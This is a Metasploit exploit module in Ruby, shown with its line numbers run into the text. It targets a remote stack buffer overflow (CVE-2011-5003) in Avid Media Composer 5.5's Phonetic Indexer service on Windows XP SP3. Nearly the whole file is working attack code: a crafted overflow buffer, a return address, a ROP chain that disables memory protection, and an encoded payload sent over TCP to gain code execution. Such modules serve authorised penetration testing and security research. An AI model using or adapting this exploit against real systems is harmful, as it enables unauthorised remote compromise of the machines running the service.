Path: blob/master/modules/exploits/windows/misc/avidphoneticindexer.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => "Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow",15'Description' => %q{16This module exploits a stack buffer overflow in process17AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer185.5 Editing Suite. This daemon sometimes starts on a different port; if you start19it standalone it will run on port 4660.20},21'License' => MSF_LICENSE,22'Author' => [23'vt [[email protected]]',24],25'References' => [26['CVE', '2011-5003'],27['OSVDB', '77376'],28[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf' ],29],30'Payload' => {31'Space' => 1012,32'BadChars' => "\x00\x09\x0a\x0d\x20",33'DisableNops' => true,34'EncoderType' => Msf::Encoder::Type::AlphanumMixed,35'EncoderOptions' =>36{37'BufferRegister' => 'EAX',38}39},40'Platform' => 'win',41'Targets' => [42[43'Windows XP Professional SP3',44{45'Ret' => 0x028B35EB # ADD ESP, 1800; RET (il.dll)46}47],48],49'Privileged' => false,50'DisclosureDate' => '2011-11-29',51'DefaultTarget' => 0,52'Notes' => {53'Reliability' => UNKNOWN_RELIABILITY,54'Stability' => UNKNOWN_STABILITY,55'SideEffects' => UNKNOWN_SIDE_EFFECTS56}57)58)5960register_options(61[62Opt::RPORT(4659),63]64)65end6667def exploit68rop_gadgets = [69# ROP chain (sayonara) courtesy of WhitePhosphorus (thanks guys!)70# a non-sayonara ROP would be super easy too, I'm just lazy :)710x7C344CC1, # pop eax;ret;720x7C3410C2, # pop ecx;pop ecx;ret;730x7C342462, # xor chain; call eax {0x7C3410C2}740x7C38C510, # writeable location for lpflOldProtect750x7C365645, # pop esi;ret;760x7C345243, # ret;770x7C348F46, # pop ebp;ret;780x7C3487EC, # call eax790x7C344CC1, # pop eax;ret;800xfffffbfc, # {size}810x7C34D749, # neg eax;ret; {adjust size}820x7C3458AA, # add ebx, eax;ret; {size into ebx}830x7C3439FA, # pop edx;ret;840xFFFFFFC0, # {flag}850x7C351EB1, # neg edx;ret; {adjust flag}860x7C354648, # pop edi;ret;870x7C3530EA, # mov eax,[eax];ret;880x7C344CC1, # pop eax;ret;890x7C37A181, # (VP RVA + 30) - {0xEF adjustment}900x7C355AEB, # sub eax,30;ret;910x7C378C81, # pushad; add al,0xef; ret;920x7C36683F, # push esp;ret;93].pack("V*")9495# need to control a buffer reg for the msf gen'd payload to fly. in this case:96bufregfix = "\x8b\xc4" # MOV EAX,ESP97bufregfix += "\x83\xc0\x10" # ADD EAX,109899connect100sploit = ''101sploit << rand_text_alpha_upper(216)102sploit << [target.ret].pack('V*')103sploit << "A" * 732 # This avoids a busted LoadLibrary104sploit << rop_gadgets105sploit << bufregfix106sploit << "\xeb\x09"107sploit << rand_text_alpha_upper(9)108sploit << payload.encoded109sock.put(sploit)110handler111disconnect112end113end114115116